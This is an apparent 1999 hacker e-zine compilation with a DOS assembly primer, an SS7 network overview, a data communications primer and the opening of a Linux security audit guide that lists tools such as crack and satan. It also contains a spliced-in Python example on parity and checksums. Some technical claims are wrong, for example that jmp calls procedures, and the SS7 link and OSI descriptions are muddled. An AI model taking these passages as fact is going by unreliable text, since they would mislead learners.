MOV [destination], [source]

The destination has to be a register, but the source can be either an immediate value or the contents of another register.

mov ax, 10 ; moves the value 10 into the register ax
mov bx, cx ; moves the value of the register cx into bx

the ; represents the end of an instruction. anything after this is a comment

PUSH [data]

Puts data onto the stack

POP [register or variable]

puts the first value on the stack into the register or variable

push ax ; puts the value of ax onto the stack
push bx ; puts the value of bx onto the stack
pop ax  ; puts the first value on the stack into ax
pop bx  ; puts the next value on the stack into bx

This program would swap the values of registers ax and bx.

INT [number]

This is a command which calls an interrupt from either DOS or the BIOS. This allows you to do things like write to the screen or open a file or something. There may be several subroutines that can be called from each interrupt number. These are distinguished between by using the register ah.

mov ah, 9 ; this tells the int command to call subroutine 9 from the interrupt
int 21h   ; this calls interrupt 21h, which is the standard DOS interrupt

In this program subroutine 9 tells the system to print something to the screen. More on this later.

From this we can write our first program.

-------------------cut here--------------------
.model small                ; assembler setup: one code and one data segment
.stack 100h                 ; assembler setup: reserve some stack space
.data
printed db "hello fucker$"  ; creates the variable 'printed'
.code
start:
    mov dx, OFFSET printed  ; sets dx to the offset of the variable 'printed'
    mov ax, SEG printed     ; sets ax to the segment of the variable 'printed'
    mov ds, ax              ; moves ax (containing the segment) to ds - because
                            ; ds is the main segment register this now means that
                            ; ds:dx is pointing to the variable 'printed'
    mov ah, 9
    int 21h                 ; this prints our message to the screen
    mov ax, 4c00h
    int 21h                 ; this executes subroutine 4c (exit code 00) in int 21h, this ends the program
END start                   ; this ends the program source and names the entry point
-------------------cut here--------------------

This is the simplest program in assembly language. It just prints the message "hello" to the screen. All strings in assembly language have to be terminated with the $ character.

Like in most other languages, you can define procedures in assembly language. You do this like this

.
.
[Code]
.
.
.
.
procedure_name:
.
.
.
.

Where procedure_name would be the name you give to the procedure. To call a procedure in assembly language you have to use a jump command, there are several of these but the most basic is simply

jmp [procedure]

this simply takes you to that procedure. There are different kinds of jump statements though, these act rather like if statements in other languages, and allow control flow in the program. With conditional jumps, there has to be a way of comparing values. This is the cmp command. It works like this

cmp ah,5 ; is ah == 5?
jne no   ; if it isn't 5, jump to the procedure 'no'

There are many different jump statements that use the compare command. Here is a list of some of them

JA:   Jump if the first number was above the second number
JB:   Jump if the first number was below the second number
JE:   Jump if both numbers were equal
JAE:  Jump if the first number was above or equal to the second number
JBE:  Jump if the first number was below or equal to the second number
JNA:  Jump if the first number was not above the second number
JNB:  Jump if the first number was not below the second number
JNE:  Jump if both numbers were not equal
JNAE: Jump if the first number was not above or equal to the second number
JNBE: Jump if the first number was not below or equal to the second number

There are other jump commands but these are the most common ones. Next time I'll show you how to write some basic programs and generally play about with the language. Keep reading

----------

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SS7 Network Components ]::[OO--[ digiphreq ]--------------------
-->]OO[::::::::::::::::::::::::::::::::::::::[ digiphreq@webcrunchers.com ]--
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Components of an SS7 Network
Darkcyde Communications 1999.
digiphreq@webcrunchers.com
written 3.29.99
released a long time afterwards....

This paper is intended as a brief overview of the components that make up a SS7 network: what they do, how they relate to other components and so on. This file won't be very complicated, but more of a small tutorial which just scrapes the surface of SS7 as a whole. This will focus more on networking than anything else.

I.   STP
II.  SP
III. Datalinks
     A. Access Links
     B. Bridge Links
     C. Cross Links
     D. Diagonal Links
     E. Extended Links
     F. Fully Associated Links
IV.  A Good Fuck You, I'm Out

I. STP:

The STP or Signaling Transfer Point is basically the "switch" of the SS7 network. It's rather similar to the switch in the PSTN. The difference is that a switch of the PSTN routes voice calls/connections, while the STP routes digital traffic in the SS7 network. It basically routes to the outside world. The pairing or networking of these is pretty simple yet quite complex. They work on a simple ladder, tree, or, more sophisticated, a hierarchical basis.

You basically have some STPs that provide access and routing for a node or local network. Next you have the STPs which connect other networks' STPs together through Access Links (discussed later). Next you have STPs which completely run the show. They work on a much larger scale and route everything from a selected Wide Area Network or WAN. Graphically it looks kind of like this.

Local to Local
    Local to Regional
        Regional to Regional
            Regional to International
                International to International
            Regional to International
        Regional to Regional
    Local to Regional
Local to Local

II. SP:

The SP or Signaling Point is a lot like a telephone number on the PSTN. In the case of SS7 they are called SPC or Signal Point Codes, thus making a service with such a code a Signaling Point. At the same time SP is also considered a suffix to much larger grouping acronyms. You have the SSP, SCP, and the MSC.

SSP- This is basically a branch of the SS7 network which offers voice connections, which is part of a SS7 Telephone Network (SS7TN).
SCP- This branch offers database services. Not really part of the whole
     scheme of things.

MSC- This branch is in control of the mobile units which provide voice
     connections.

III. Data Links:

In the SS7 network you must send data of numerous types to other SPs and
this is done through links. Basically they don't concern themselves with how
they transmit the data, but more with what they are actually transmitting,
which breaks this down further so you have several types of links, each
categorizing a data type.

        (A) Access Links
        (B) Bridge Links
        (C) Cross Links
        (D) Diagonal Links
        (E) Extended Links
        (F) Fully Associated Links

Access Links- These provide the link between the basic node and STP pairs.
They are what opens the connection to the STP and keeps it up and running.

Bridge Links- These are what more or less connect STPs on local to local
networks. The more of these Bridge Links you have, the more flexibility you
will have in routing the services through STPs. Four of these links are
required to connect all the linked STPs of one area to the STPs of another
area.

Cross Links- To make sure service can still be provided when one of the STPs
of a pair gets screwed up, you have Cross Links, which connect two paired
STPs together so they are more able to communicate. In most cases the pair
is doing the same task and this can also let the pair speed up the overall
performance.

Diagonal Links- These are exactly like Bridge Links, only they connect the
smaller network of local networks and STPs to a Regional STP which might
have several of these smaller networks hooked to it. Just remember they are
Bridge Links on steroids which connect Local to Regional.

Extended Links- These again are nothing more than really large Bridge Links.
Instead of hooking an STP pair to a regional STP and then to another local
STP pair, these link them directly. Kind of like this.

        ______________Regional STP__________________
       /                                            \
      /                                              \
STP Pair 1----------Extended Link---------------STP Pair 2

Fully Associated Links- These occur when a company owns two or more nodes
and wishes to connect them internally while avoiding an STP. This is only
done when a company owns the two nodes and at no other time. Thus making the
nodes associated through the same company, which is why these links are
called Associated Links...

Ok, well that's it. If it thoroughly confused you, read it again. If you
already knew this crap good for you smart ass. Why don't you go learn
something new now. I hope to put a more detailed article on Components of an
SS7 Network up soon.

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Electronic Data Communication ]::[OO---------[ zomba ]----------
-->]OO[:::::::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]----------
-->[OO]:::::::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]::::::

--oOo--> Covered in this Article:                      ]------------------------
--oOo--> --------------------------------------------------
--oOo--> Introduction                                  ]---
--oOo--> PRINCIPLE OF ELECTRONIC DATA COMMUNICATION    ]---
--oOo--> ==========================================    ]---
--oOo-->  --> Communications Links                     ]---
--oOo-->  --> Communications Media                     ]---
--oOo-->  --> Modems                                   ]---
--oOo-->  --> Multiplexors                             ]---
--oOo--> COMMUNICATION METHODS                         ]---
--oOo--> =====================                         ]---
--oOo-->  --> Simplex/duplex Transmission              ]---
--oOo-->  --> Synchronous and Asynchronous Transmission ]---
--oOo-->  --> Data transfer checks                     ]---
--oOo-->  --> Circuit Switching                        ]---
--oOo-->  --> Packet Switching                         ]---
--oOo-->  --> Advantages of Packet Switching           ]---
--oOo-->  --> Data Compression                         ]---
--oOo-->  --> Data Encryption                          ]---
--oOo-->  --> The TCP/IP Protocol                      ]---
--oOo-->  --> The ISO OSI seven-layer Model            ]---
--oOo-->  --> Bridges and Gateways/Routers             ]---

Introduction
--oOo-------

This article is meant to give you, the ereet
public, a brief insight into how data communications werk. The parts on
TCP/IP and the ISO OSI seven-layer model were originally part of a file I
was writing for ETG (now defunct) but I thought they were relevant to this
article and so have included them. If you have been using the net for a
while then the OSI model will be instantly recognisable even if you've never
seen it before, as it is basically just how the internet protocols werk and
their ports etc (ie: Telnet, port 23). A lot of this article was taken from
other sources as they explained better than I ever could :)

PRINCIPLE OF ELECTRONIC DATA COMMUNICATION
==========================================

Data communication involves sending and receiving data from one computer or
data processing device to another. Applications using for example e-mail,
supermarket EPOS (Electronic Point-Of-Sale) terminals, cash dispensers, fax
machines and video conferencing are all examples of this.

When the devices are close together, for example in the same building, they
can be linked by means of cables. However, when devices are separated by
more than a few hundred yards, data has to be sent over a communications
link (eg. telephone line) and extra equipment such as a modem is required.

Communications Links
--oOo---------------

In the UK, BT, Mercury and other telcos provide services and data links.
Telephone lines may be either:

--> public lines, on which the cost of sending data depends on the length of
    time taken;

--> private or leased lines, for which there is a fixed annual fee and the
    line can be used 24/7 with no extra cost.

Communications Media
--oOo---------------

Communication may take place over a combination of different media.

--> twisted pair (copper cable), used in much of the PSTN;

--> coaxial cable - high quality, well-insulated cable that can transmit
    data at higher speeds;

--> fibre optic cable through which pulses of light, rather than
    electricity, are sent in digital form;

--> communications satellite, using one of the hundreds of satellites now in
    geosynchronous orbit about 22,000 miles above the Earth (for all you
    l4m3rs, geosynchronous means that they are rotating at the same speed as
    the Earth and are therefore stationary relative to it);

--> microwave - similar to radio waves. Microwave stations cannot be much
    more than 30 miles apart because of the Earth's curvature, as microwaves
    travel in straight lines.

The amount of data that can be sent over the line depends partly on the
bandwidth, which is the range of frequencies that the line can carry. The
greater the bandwidth, the greater the rate at which data can be sent, as
several messages can be transmitted simultaneously.

A network that is capable of sending voice, video and computer data is
called an 'integrated services digital network' (ISDN), and this requires a
high bandwidth.

Modems
--oOo-

Telephone lines were originally designed for speech, which is transmitted in
analogue or wave form. In order for digital data to be sent over a telephone
line, it must first be converted to analogue form and then converted back to
digital at the other end. This is achieved by means of a modem (MOdulator
DEModulator) at either end of the line.

  Digital Signal                                          Digital Signal
         \                                                  /
          \              Analogue Signal                   /
Computer------Modem--------------------------------Modem------Computer

Multiplexors
--oOo-------

A multiplexor combines more than one input signal into a stream of data that
can be transmitted over a single communications channel. This means, for
example, that a local area network of 48 PCs could all communicate with a
mainframe at some geographically remote head office via a single leased line
attached to a multiplexor.
At the mainframe end, there is likely to be a front-end processor which will
handle the communications, leaving the main processor free for other tasks.

Computer\
         \                                                          ___ Mini
          \                                                        /    mainframe
Computer---Multiplexor---Modem------------------Modem---Multiplexor---- -or-
          /                                                        \___ front-end
         /                                                              processor
Computer/

COMMUNICATION METHODS
=====================

Simplex, half-duplex and full-duplex transmission
--oOo--------------------------------------------

There are three possible modes of transmission:

--> Simplex - transmission can take place only in one direction. This type
    of transmission could be used for example when the sending device, such
    as a temperature sensor, never requires a response from the computer.

--> Half-duplex - transmission can take place in both directions but not
    simultaneously. This type of transmission is often used between a
    central computer and terminals.

--> Full-duplex - transmission can take place in both directions
    simultaneously. It is suitable for interactive computer applications.

Synchronous and Asynchronous transmission
--oOo-----------------------------------

With asynchronous transmission, one character at a time is sent, with each
character being preceded by a start bit and followed by a stop bit. A parity
bit is also usually included as a check against incorrect transmission. This
type of transmission is usually used by PCs, and is fast and economical for
relatively small amounts of data.

In synchronous transmission mode, timing signals (usually the computer's
internal clock) control the rate of transmission and there is no need for
start and stop bits to accompany each character. Mainframe computers usually
use synchronous transmission. It is less error-prone than asynchronous
transmission.

Data Transfer Checks
--oOo---------------

The following checks may be made during data transmission:

--> parity checks - an extra bit is transmitted with each character to make
    the number of bits set to 1 even (for even parity) or odd (for odd
    parity).

--> checksum - may be sent with each block of data transmitted. All the
    elements in the block (eg: words or bytes) are added together (ignoring
    overflow) to produce a single element known as the checksum, and this is
    stored and transmitted with the block, and checked on receipt.

Circuit Switching
--oOo------------

An excellent example of circuit switching is the public telephone system,
which uses circuit-switched paths. When a caller dials a number, the path
between the two telephones is set up by operating switches in all of the
exchanges involved in the path, and the circuit is set up and held for the
entire duration of the call (even through periods of silence). This allows
the two people on the phone ('leeto phreaks!) to hold a conversation with no
waiting at either end.

  [Diagram: ph0nes wired to Local Exchanges, with the Local Exchanges linked
   to each other through a chain of Trunk Exchanges.]

Packet Switching
--oOo-----------

In a packet switching system (PSS) data is divided into packets -
fixed-length blocks of data of, say, 128 bytes. As well as the data, each
packet also carries:

--> the source and destination address;

--> a packet sequence number so that the whole message can be correctly
    reassembled;

--> a checksum (longitudinal parity check) for the purpose of error
    checking.

The PSS takes the form of a computer network in which each computer
redirects packets it receives to the next computer along an appropriate
route to its destination.

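An added example (not from the original article) of the parity and checksum checks under Data Transfer Checks and the packet fields listed under Packet Switching, showing what each check catches and what it misses. The function names and the dict layout of a packet are assumptions of this sketch.

```python
# Added illustration (not from the original article): parity, additive
# checksum and fixed-length packets as described in the text above.
# Function names and the dict layout of a packet are assumptions.

PACKET_DATA_LEN = 128  # the article's example packet size, in bytes


def add_parity(char7):
    """Return the 8-bit unit sent for a 7-bit character: even parity in bit 7."""
    char7 &= 0x7F
    parity = bin(char7).count("1") % 2      # 1 only if the data has an odd count
    return (parity << 7) | char7


def parity_ok(unit8):
    """Receiver's check: with even parity the total number of 1 bits is even."""
    return bin(unit8 & 0xFF).count("1") % 2 == 0


def checksum(block):
    """Add every byte of the block together, ignoring overflow past 8 bits."""
    return sum(block) & 0xFF


def packetize(src, dst, message, size=PACKET_DATA_LEN):
    """Split message into packets carrying addresses, sequence number, checksum."""
    packets = []
    for seq, offset in enumerate(range(0, len(message), size)):
        data = message[offset:offset + size]   # the last packet may be shorter
        packets.append({"src": src, "dst": dst, "seq": seq,
                        "data": data, "checksum": checksum(data)})
    return packets


def reassemble(packets):
    """Rebuild the message by sequence number.

    Returns (message, bad_seqs); packets whose checksum does not match are
    left out and reported so the sender can be asked to retransmit them.
    """
    good, bad = {}, []
    for p in packets:
        if checksum(p["data"]) == p["checksum"]:
            good[p["seq"]] = p["data"]
        else:
            bad.append(p["seq"])
    return b"".join(good[s] for s in sorted(good)), sorted(bad)


if __name__ == "__main__":
    unit = add_parity(ord("C"))             # 'C' = 1000011, three 1 bits
    print("sent unit      :", format(unit, "08b"))
    print("1 bit flipped  :", parity_ok(unit ^ 0b00000001))   # caught
    print("2 bits flipped :", parity_ok(unit ^ 0b00000011))   # missed

    # Additive checksums miss reordered bytes and changes that cancel out.
    print("AB vs BA       :", checksum(b"AB") == checksum(b"BA"))

    message = bytes(range(256)) * 2          # constructed 512-byte payload
    packets = packetize("host-a", "host-b", message)
    packets.reverse()                        # arrive out of order
    damaged = dict(packets[0], data=b"\xff" + packets[0]["data"][1:])
    rebuilt, bad = reassemble([damaged] + packets[1:])
    print("packets        :", len(packets), "bad seqs:", bad)
    # These checks catch line noise only: anyone who alters the data on
    # purpose can recompute the checksum to match.
```

Both checks are error detection for noisy lines, not integrity protection against someone who changes the data deliberately.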
Advantages of packet switching
--oOo-------------------------

--> More efficient use of lines is possible.

--> Cost depends only on the number of packets sent, not on distance, so all
    data is transmitted at local call rates.

--> It is less likely to be affected by network failure because of the
    multiple routes available to transmit data packets.

--> Security is better; data is less likely to be intercepted because the
    packets may be sent along different routes or be interleaved with other
    unrelated packets.

Data Compression
--oOo-----------

Data compression is frequently used when transmitting large quantities of
data, thereby reducing the number of blocks transmitted and hence the cost.
It basically works by replacing runs of a repeated byte with one copy of the
byte plus a count of the repetitions.

Data Encryption
--oOo----------

Data encryption is used for security purposes when transmitting or storing
confidential data. The data to be transmitted is encoded using a
mathematical algorithm or substitution of letters, so that even if it is
intercepted it cannot be read.

w0rd to the                     OfKIZk\$5zG                     w0rd to the
darkcyde   ---> ENCRYPTION -->  OPbNd5%6&#S  --> DECRYPTION --> darkcyde
collective                      WeDgNC$£1GG8                    collective

Plaintext                       Ciphertext                      Plaintext

The TCP/IP Protocol
--oOo--------------

Basically, TCP/IP is a set of protocols developed around the ARPAnet (where
the internet began - just in case you didn't know!) which allows
co-operating computers to share resources across a network. The most
accurate name for this set of protocols is the 'Internet Protocol Suite' -
TCP and IP are just two of the protocols in this suite. Because TCP and IP
are the best known of all the protocols, they have been joined to create the
most common term - TCP/IP.

TCP/IP protocols map to a four-layered conceptual model: Applications,
Transport, Internet, and Network Interface.
Each layer on the TCP/IP model corresponds to one or more layers on the
International Standards Organisation (ISO) seven-layer Open Systems
Interconnection (OSI) model, which I will go into more detail on later in
the file. Below I have attempted to draw a diagram to show this.

        OSI Model              TCP/IP Model

    |--------------|       |-----------------|
    | Application  |       |                 |
    |--------------|       |                 |
    | Presentation |       |   Application   |
    |--------------|       |                 |
    | Session      |       |                 |
    |--------------|       |-----------------|
    | Transport    |       |    Transport    |
    |--------------|       |-----------------|
    | Network      |       |    Internet     |
    |--------------|       |-----------------|
    | Data-link    |       |                 |
    |--------------|       |Network Interface|
    | Physical     |       |                 |
    |--------------|       |-----------------|

Defined within the four layers of TCP/IP are protocols that dictate how
computers connect and communicate. The most common of these are Transmission
Control Protocol (TCP), User Datagram Protocol (UDP), Internet Protocol
(IP), Address Resolution Protocol (ARP), and Internet Control Message
Protocol (ICMP).

Transmission Control Protocol (TCP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is the most common higher-level protocol in the suite. TCP guarantees
the delivery of packets, ensures proper sequencing of data, and provides a
checksum feature that validates both the packet header and its data for
accuracy. If the network either corrupts or loses a TCP packet during
transmission, TCP is responsible for re-transmitting the faulty packet. This
level of reliability makes TCP the protocol of choice for session-based data
transmission, client-server applications, and critical services such as
email.

This reliability however has its downfalls - TCP headers require additional
bits to provide proper sequencing of information, as well as a mandatory
checksum to ensure reliability of both the TCP packet header and the packet
data. To guarantee successful data delivery, the protocol also requires that
the recipient acknowledge successful receipt of data.
Such acknowledgements (ACKs) generate additional network traffic, thus
diminishing the rate at which data passes. To reduce the impact on
performance, most hosts send an acknowledgement for every other segment or
when a specified time interval has passed.

User Datagram Protocol (UDP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

If reliability is not totally essential then UDP, a TCP complement, offers a
connectionless datagram service that guarantees neither delivery nor correct
sequencing of delivered packets (much like IP). Higher-level protocols or
applications might provide reliability mechanisms in addition to UDP/IP.

UDP data checksums are optional, providing a way to exchange data over
highly reliable networks without unnecessarily consuming network resources
or processing time. When UDP checksums are used, they validate both the
integrity of the header and the data. ACKs are not enforced by the UDP
protocol; this is left to higher-level protocols. UDP also supports sending
data from a single sender to multiple receivers.

Internet Protocol (IP)
~~~~~~~~~~~~~~~~~~~~~~

IP provides packet delivery for all other protocols within the suite. It
provides a best-effort, connectionless delivery system for computer data.
Packets are not guaranteed to be delivered, nor to be received in the order
they are sent, as the protocol's checksum feature only confirms the header's
integrity. Responsibility for the data contained in the IP packets is only
ensured by using higher-level protocols.

Address Resolution Protocol (ARP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ARP is not directly related to data transport but is very important
nonetheless. ARP is one of the maintenance protocols that supports the
TCP/IP suite and is usually invisible to users and applications. If two
systems are to communicate over a TCP/IP network, the system sending the
packet must map the IP address of the final destination to the physical
address of the final destination.
IP acquires this physical address by broadcasting a special inquiry packet
(an ARP request packet) containing the IP address of the destination system.
All ARP-enabled systems on the local IP network detect these broadcast
messages, and the system that owns the IP address in question replies by
sending its physical address to the requester (in an ARP reply packet). The
physical/IP address is then stored in the ARP cache of the requesting system
for subsequent use.

Because the ARP reply can also be broadcast to the network, other systems on
the network can use this information to update their own ARP caches. (You
can use the 'arp' utility to view the ARP tables.)

Internet Control Message Protocol (ICMP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ICMP is another of the maintenance protocols. It allows two systems on an IP
network to share status and error info. This information is often used by
network admins to detect network trouble or recover from transmission
problems. ICMP packets are stored within IP packets and are not really
considered to be a higher-level protocol.

The 'ping' utility uses the ICMP echo request and echo reply packets to
determine whether a particular IP system on a network is functional. Because
of this, the ping utility is useful for diagnosing IP networks or router
failures.

The ISO OSI seven-layer Model
--oOo------------------------

The seven layers of the Open System Interconnection (OSI) model are shown in
my diagram below. The reason for the model was to try and introduce some
standardisation into the protocols of network communication.

|-----(7)-----|-----(6)----|---(5)----|----(4)-----|---(3)----|----(2)----|----(1)----|
| Application |Presentation| Session  | Transport  | Network  | Data Link | Physical  |
|-------------|------------|----------|------------|----------|-----------|-----------|
|-------------|------------|----------|------------|----------|-----------|-----------|
|    Email    |  POP/SMTP  |  POP/25  |            |          |           |RS-X, CAT 1|
|-------------|------------|----------|            |          |           |-----------|
| Newsgroups  |   Usenet   |   532    |            |          |           |   ISDN    |
|-------------|------------|----------|            |          | SLIP, PPP |-----------|
|     Web     |    HTTP    |    80    |            |          |           |   ADSL    |
|Applications |            |          |            |          |           |           |
|-------------|------------|----------|Transmission| Internet |           |-----------|
|File Transfer|    FTP     |  20/21   |  Control   | Protocol |           |    ATM    |
|-------------|------------|----------|  Protocol  | Version 6|-----------|-----------|
|Host Sessions|   Telnet   |    23    |            |          |                       |
|-------------|------------|----------|            |          |-----------|-----------|
|  Directory  |    DNS     |    53    |------------|----------|           |   FDDI    |
|  Services   |            |          |            |          |802.2 SNAP |-----------|
|-------------|------------|----------|            |          |           |  CAT 1-5  |
| Network Mgt.|    SNMP    | 161/162  |    User    | Internet |-----------|-----------|
|-------------|------------|----------|  Datagram  | Protocol |           |  Coaxial  |
|File Services|    NFS     |   RPC    |  Protocol  | Version 4|Ethernet II|   Cable   |
|             |            |Portmapper|            |          |           |           |
|-------------|------------|----------|------------|----------|-----------|-----------|

By looking at the model in this way you will probably find that you are
familiar with the concept even if you have never seen it before, as most
people know at the very least things like port 80 is for HTTP and 23 for
Telnet etc.

The OSI model was introduced to describe how messages should be transmitted
between two computers on a network so that product implementors could
produce products that would consistently work with each other.
The idea is that messages are only transmitted in the physical layer. If the
message is received by a host that is not the target then it will not
proceed up the layers, it will just be passed on.

The top four layers (4,5,6,7) are known as the 'upper layers' and the bottom
three layers (1,2,3) are known as the 'lower layers'. The upper layers are
used whenever a message passes from or to a user. The lower layers are used
whenever a message passes through a host computer.

Layer 7: Application Layer
~~~~~~~~~~~~~~~~~~~~~~~~~~

This is the layer at which communication partners are identified, quality of
service is identified, user authenticity and privacy are considered, and any
constraints on data syntax are identified. They are /not/ the actual
applications themselves, but having said that, some applications perform
application layer functions.

Layer 6: Presentation Layer
~~~~~~~~~~~~~~~~~~~~~~~~~~~

This layer is usually a part of the operating system. It converts incoming
and outgoing data from one presentation format to another, ie. ASCII to
EBCDIC. It is sometimes called the syntax layer. It also handles encryption
and compression of data.

Layer 5: Session Layer
~~~~~~~~~~~~~~~~~~~~~~

This layer basically sets up, co-ordinates and terminates conversations,
exchanges and dialogs between the application at each end. It deals with
session and connection co-ordination. It allows application processes to
register unique addresses, such as NetBIOS names. It also has some other
support functions including user authentication and resource-access
security.

Layer 4: Transport Layer
~~~~~~~~~~~~~~~~~~~~~~~~

This layer manages the end-to-end control, ie: determining whether all
packets have arrived. It also deals with error checking to ensure complete
data transfer.

Layer 3: Network Layer
~~~~~~~~~~~~~~~~~~~~~~

This layer handles the routing of the data, ie: sending it in the right
direction to the right destination on outgoing transmissions and receiving
incoming transmissions at the packet level. It basically deals with routing
and forwarding. It controls subnet traffic to allow intermediate systems to
instruct a sending station not to transmit its frame when the router's
buffer is full. If the router is busy, the network layer can instruct the
sending station to use an alternate router.

Layer 2: Data Link Layer
~~~~~~~~~~~~~~~~~~~~~~~~

This layer provides error control and synchronisation for the physical level
and does bit-stuffing for strings of 1's in excess of 5. It furnishes
'transmission protocol' knowledge and management. It establishes and
terminates a logical link (virtual-circuit connection) between two computers
identified by their unique network interface card (NIC) addresses.

Layer 1: Physical Layer
~~~~~~~~~~~~~~~~~~~~~~~

This layer conveys the bit-stream through the network at the electrical and
mechanical level. It provides the hardware means of sending and receiving
data on a carrier. Data-encoding modifies the digital-signal pattern (1s and
0s) used by the computer to better accommodate the characteristics of the
physical medium and to assist in bit and frame synchronisation.
Data-encoding resolves which signal pattern represents a binary 1, how the
receiving station recognises when a 'bit-time' starts and how the receiving
station delimits a frame.

Bridges and Gateways/Routers
--oOo-----------------------

A bridge is a connection between two local area networks. Wide area networks
may be connected through a system of routers/gateways, a gateway being a
computer which acts as a point of connection between different networks.

Shouts and Greetz
--oOo------------

The usual peeps: Werd to the darkcyde collective, extra shouts to hybrid,
bodie and force.
Also greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf,
downtime, kryptus. L8r.

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Linux System Security ]::[OO--[ by zomba ]------------------------
-->]OO[::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]:::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]:::::::::::

*****************************************************************************
************************** D4RKCYDE present (1999) **************************
*****************************************************************************

--oOo--> Covered in this Article:                    ]-------------------
--oOo--> ---------------------------------------------
--oOo--> Introduction                                ]---
--oOo--> Thinking up a Security Audit                ]---
--oOo--> Part 1: The Plan                            ]---
--oOo--> Part 2: The Tools                           ]---
--oOo--> Part 3: Knowledge Gathering                 ]---
--oOo--> suid and sgid                               ]---
--oOo--> How to find suid and sgid files             ]---
--oOo--> Setting suid and sgid                       ]---
--oOo--> File and Directory Permissions              ]---
--oOo-->         : Files                             ]---
--oOo-->         : Directories                       ]---
--oOo--> How suid and sgid fit into this picture     ]---
--oOo--> The default mode for a file or directory    ]---
--oOo--> Passwords: A second look                    ]---
--oOo--> Related WWW sites                           ]---

Introduction
--oOo-------

In this phile you will learn how to protect your box from those nasty
hacker-type people, which more often than not will be your online buddies :]
When you're thinking about your system security you have to remember that
your system is as secure as its weakest point. Now, this is an old saying
but it has a lot of truth in it; it's like locking all your windows to stop
intruders but leaving the back-door unlocked. Read on...

Thinking up a Security Audit
--oOo-----------------------

There are three basic parts to a security audit:

o--> The Plan - (ie: a set of security aspects to be evaluated)

o--> The Tools - (ie: what tools are available to you to assist in
     evaluating the security aspects)

o--> Knowledge Gathering - (ie: finding out the ways in which your system
     can be attacked, this includes physical security issues, learning about
     the system itself and much much more)

Part 1: The Plan
--oOo-----------

Now the plan doesn't really have to be anything more than a quick scribble
on a bit of paper that details what you are going to do. It should, though,
revolve around two basic questions:

o--> What types of security problems could I have?
o--> Which ones can I attempt to fix?

In order to answer these questions, you may have to find out a bit more
about several areas of your system. These include:

o--> Accountability
o--> Change control and tracking
o--> Data integrity, including backups
o--> Physical security
o--> Privacy of Data
o--> System access
o--> System availability

Okay werd, so now you have a more detailed description of what you want to
achieve, you can write up a more complex plan. As always, there will be
trade-offs. For example, privacy of data could mean that only certain people
can log into your box, which affects system access for the users. System
availability is always in contention with change control. For example, when
do you change that failing hard-drive on a 24/7 system? What I'm trying to
get at here is that the detailed plan that is developed should include a set
of goals; a way of tracking the progression of the goals, including changes
to the system; and a knowledge base of what types of tools are needed to do
the job.

Part 2: The Tools
--oOo------------

Okay, so now you should have a fair idea of what you want to do, now you
have to think about *how* you are going to do it.
A number of tewls are available on the internet, including tools to check
passwords, check system security, and protect your system. CERT, CIAC, and
the Linux Emergency Response Team are often good sources of information for
both the beginner and advanced sysadmin.

The following is a list of tools, all freely available if you look for them.
Make sure you look around for some other tools as well though!

--> cops                 [ A set of programs; each checks a different aspect ]
                         [ of security on a *nix system. If any potential    ]
                         [ security holes do exist, the results are either   ]
                         [ mailed or saved to a report file.                 ]

--> crack                [ A program designed to find standard *nix eight-   ]
                         [ character DES-encrypted passwords by standard     ]
                         [ guessing techniques.                              ]

--> deslogin             [ A remote login program that can be used safely    ]
                         [ across insecure networks.                         ]

--> findsuid.tar.Z       [ Finds changes in setuid (set user ID) and setgid  ]
                         [ (set group ID) files.                             ]

--> finger daemon        [ Secure finger daemon for *nix. Should compile out-]
                         [ of-the-box nearly anywhere.                       ]

--> freestone            [ A portable, fully functional firewall             ]
                         [ implementation.                                   ]

--> gabriel              [ A satan detector. gabriel gives the sysadmin an   ]
                         [ early warning of possible network intrusions by   ]
                         [ detecting and identifying satan's network probe.  ]

--> ipfilter             [ A free packet filter that can be incorporated into]
                         [ any of the supported operating systems, providing ]
                         [ IP packet-level filtering per interface.          ]

--> ipfirewall           [ An IP packet filtering tool, similar to the packet]
                         [ filtering facilities provided by most commercial  ]
                         [ routers.                                          ]

--> kerberos             [ A network authentication system for use on        ]
                         [ physically insecure networks. It allows entities  ]
                         [ communicating over a network to prove their       ]
                         [ identities to each other while preventing eaves-  ]
                         [ dropping or replay attacks.                       ]

--> merlin               [ Takes a popular secur1ty tewl (such as tiger,     ]
                         [ tripwire, cops, crack, or spi) and provides it    ]
                         [ with an easy-to-use, consistent graphical         ]
                         [ interface, simplifying and enhancing its          ]
                         [ capabilities.                                     ]

--> npasswd              [ passwd replacement with password sanity check.    ]

--> obvious-pw.tar.Z     [ An obvious password detector.                     ]

--> opie                 [ Provides a one-time password system for POSIX-    ]
                         [ compliant UNIX-like operating systems.            ]

--> pcheck.tar.Z         [ Checks formats of /etc/passwd; verifies root      ]
                         [ default shell and passwd fields.                  ]

--> Plugslot Ltd.        [ PCP/PSP UNIX network security and configuration   ]
                         [ monitor.                                          ]

--> rsaeuro              [ A cryptographic tewl-kit providing various        ]
                         [ functions for the use of digital signatures, data ]
                         [ encryption, and supporting areas (PEM encoding,   ]
                         [ random number generation, and so on).             ]

--> rscan                [ Allows sysadmins to execute complex (or simple)   ]
                         [ scanner scripts on one (or many) machines and     ]
                         [ create clean, formatted reports in either ASCII or]
                         [ HTML.                                             ]

--> satan                [ The secur1ty analysis tewl for auditing networks. ]
                         [ In its simplest (and default) mode, it gathers as ]
                         [ much information about remote hosts and networks  ]
                         [ as possible by examining such network services    ]
                         [ such as finger, NFS, NIS, ftp and tftp, rexd, and ]
                         [ many others.                                      ]

--> ssh                  [ Secure shell - a remote login program.            ]

--> tcp wrappers         [ Monitor and control remote access to your local   ]
                         [ tftp, exec, ftp, rsh, telnet, rlogin, finger and  ]
                         [ systat daemon.                                    ]

--> tiger                [ Scans a system for potential secur1ty problems.   ]

